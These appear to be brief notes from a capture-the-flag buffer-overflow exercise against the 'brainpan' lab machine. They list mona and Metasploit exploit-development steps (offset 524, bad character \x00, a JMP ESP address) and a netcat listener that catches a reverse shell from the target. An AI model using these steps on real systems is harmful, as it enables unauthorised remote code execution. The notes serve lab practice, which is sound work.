3 BOF
exploit
msf-pattern_create -l 700
!mona findmsp -distance 700
offset 524
=1= \x00
!mona bytearray -cpb "\x00"
!mona compare -f C:\kashz\brainpan\bytearray.bin -a 005FF910
unmodified
JMP Point:
!mona jmp -r esp -cpb "\x00"
311712F3
\xf3\x12\x17\x31
$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.2.74.151] from (UNKNOWN) [10.10.194.101] 54043
CMD Version 1.4.1
Z:\home\puck>
Changing to linux shellcode as its a linux system with windows running under wine.
Last updated